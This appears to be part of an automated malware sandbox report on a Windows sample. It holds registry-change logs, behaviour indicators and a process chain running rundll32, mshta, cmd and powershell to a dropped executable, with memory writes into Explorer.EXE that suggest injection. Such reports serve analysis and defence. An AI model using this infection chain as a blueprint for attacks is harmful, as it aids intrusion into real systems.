Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e27b47e-e553-4527- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2627c808a0ba18432cf5bae23894f1892c0a1efce0a5f1ebd5e3e310ea89f456"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec5cfe51-81af-4be4- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\abb29887-a4eb-490a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec5cfe51-81af-4be4- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7bc0088eba699b92efa47081b58ef5b52a864bfaa41addce48899aae05b2dfe4"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82ef5310-d0cf-487b-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df58ecb6-ad40-4a81- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e158f9b1-59c2-4f1c- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4748e636-429f-4ebd- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002cdc658c57f8d9012cdc658c57f8d9012cdc658c57f8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000376263303038386562613639396239326566613437303831623538656635623532613836346266616134316164646365343838393961616530356232646665340000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000d4b8dd00370062006300300030003800380065006200610036003900390062003900320065006600610034003700300038003100620035003800650066003500620035003200610038003600340062006600610061003400310061006400640063006500340038003800390039006100610065003000350062003200640066006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37626330303838656261363939623932656661343730383162353865663562353261383634626661613431616464636534383839396161653035623264666534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e05a99437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e05a99437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5ddfdd8a-323e-4120- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007c048c8c57f8d9017c048c8c57f8d9017c048c8c57f8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000376432643836363031333533343136623864393835666233613132386136303436663433643635366664373034323264323137646166393061346534646233650000b20009000400efbe4657456a4657456a2e000000000000000000000000000000000000000000000000008490b700370064003200640038003600360030003100330035003300340031003600620038006400390038003500660062003300610031003200380061003600300034003600660034003300640036003500360066006400370030003400320032006400320031003700640061006600390030006100340065003400640062003300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37643264383636303133353334313662386439383566623361313238613630343666343364363536666437303432326432313764616639306134653464623365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e05c99437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e05c99437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e27b47e-e553-4527- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4748e636-429f-4ebd- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e158f9b1-59c2-4f1c- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\39bd5b8a-f2a9-4e1a- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4748e636-429f-4ebd- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7bc0088eba699b92efa47081b58ef5b52a864bfaa41addce48899aae05b2dfe4"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e27b47e-e553-4527- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f471ddad-8220-4c8f- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\abb29887-a4eb-490a- = 3f2a858d57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e27b47e-e553-4527- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e0123a8d57f8d901ae35608d57f8d901ae35608d57f8d901821d07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000323632376338303861306261313834333263663562616532333839346631383932633061316566636530613566316562643565336533313065613839663435360000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000b9cdb200320036003200370063003800300038006100300062006100310038003400330032006300660035006200610065003200330038003900340066003100380039003200630030006100310065006600630065003000610035006600310065006200640035006500330065003300310030006500610038003900660034003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32363237633830386130626131383433326366356261653233383934663138393263306131656663653061356631656264356533653331306561383966343536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06399437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e06399437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e158f9b1-59c2-4f1c- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\073d2487c7d2f28548abe92373ad335ad4a29a209841581499e4c9daf24869ec"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82ef5310-d0cf-487b- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\699f7cbb33db3ab991e33086e25d61fb179f5cbb7d286fc5a3254b92c51215c4"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b5ae92b-0986-4f8a- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000dd73fe8c57f8d901e0d51f8d57f8d901e0d51f8d57f8d9012f3e03000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000376432643836363031333533343136623864393835666233613132386136303436663433643635366664373034323264323137646166393061346534646233650000b20009000400efbe4657456a4657456a2e000000000000000000000000000000000000000000000000008490b700370064003200640038003600360030003100330035003300340031003600620038006400390038003500660062003300610031003200380061003600300034003600660034003300640036003500360066006400370030003400320032006400320031003700640061006600390030006100340065003400640062003300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37643264383636303133353334313662386439383566623361313238613630343666343364363536666437303432326432313764616639306134653464623365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06199437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e06199437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\39bd5b8a-f2a9-4e1a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\39bd5b8a-f2a9-4e1a- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e4b139a83e7484024779b5fcc44f4eeb0c768d9a13a1392fa676aa79127b8841"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537cc51e-2d8e-44bb-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\47a072e1-99d0-49ca-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\abb29887-a4eb-490a- = "8324"	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4644 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4644 PING.EXE

pid	process
4644	PING.EXE

pid	process
4644	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeyYqgVvhX.exepowershell.exeExplorer.EXE

pid	process
4148	powershell.exe
4148	powershell.exe
2528	yYqgVvhX.exe
2528	yYqgVvhX.exe
472	powershell.exe
472	powershell.exe
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

472 powershell.exe
3204 Explorer.EXE
3204 Explorer.EXE
3204 Explorer.EXE
3204 Explorer.EXE
3204 Explorer.EXE
3204 Explorer.EXE
2244 cmd.exe

pid	process
472	powershell.exe
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
2244	cmd.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	472	powershell.exe
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3720	RuntimeBroker.exe
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

1904 rundll32.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3204 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3204 Explorer.EXE

pid	process
1904	rundll32.exe

pid	process
3204	Explorer.EXE

pid	process
3204	Explorer.EXE

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

rundll32.exemshta.execmd.exepowershell.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1904 wrote to memory of 2104	1904	rundll32.exe	mshta.exe
PID 1904 wrote to memory of 2104	1904	rundll32.exe	mshta.exe
PID 1904 wrote to memory of 2104	1904	rundll32.exe	mshta.exe
PID 2104 wrote to memory of 3232	2104	mshta.exe	cmd.exe
PID 2104 wrote to memory of 3232	2104	mshta.exe	cmd.exe
PID 2104 wrote to memory of 3232	2104	mshta.exe	cmd.exe
PID 3232 wrote to memory of 4148	3232	cmd.exe	powershell.exe
PID 3232 wrote to memory of 4148	3232	cmd.exe	powershell.exe
PID 3232 wrote to memory of 4148	3232	cmd.exe	powershell.exe
PID 4148 wrote to memory of 2528	4148	powershell.exe	yYqgVvhX.exe
PID 4148 wrote to memory of 2528	4148	powershell.exe	yYqgVvhX.exe
PID 4148 wrote to memory of 2528	4148	powershell.exe	yYqgVvhX.exe
PID 2036 wrote to memory of 472	2036	mshta.exe	powershell.exe
PID 2036 wrote to memory of 472	2036	mshta.exe	powershell.exe
PID 472 wrote to memory of 5012	472	powershell.exe	csc.exe
PID 472 wrote to memory of 5012	472	powershell.exe	csc.exe
PID 5012 wrote to memory of 4256	5012	csc.exe	cvtres.exe
PID 5012 wrote to memory of 4256	5012	csc.exe	cvtres.exe
PID 472 wrote to memory of 4736	472	powershell.exe	csc.exe
PID 472 wrote to memory of 4736	472	powershell.exe	csc.exe
PID 4736 wrote to memory of 4772	4736	csc.exe	cvtres.exe
PID 4736 wrote to memory of 4772	4736	csc.exe	cvtres.exe
PID 472 wrote to memory of 3204	472	powershell.exe	Explorer.EXE
PID 472 wrote to memory of 3204	472	powershell.exe	Explorer.EXE
PID 472 wrote to memory of 3204	472	powershell.exe	Explorer.EXE
PID 472 wrote to memory of 3204	472	powershell.exe	Explorer.EXE
PID 3204 wrote to memory of 3720	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 3720	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 3720	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 3720	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 4016	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 4016	3204	Explorer.EXE	RuntimeBroker.exe
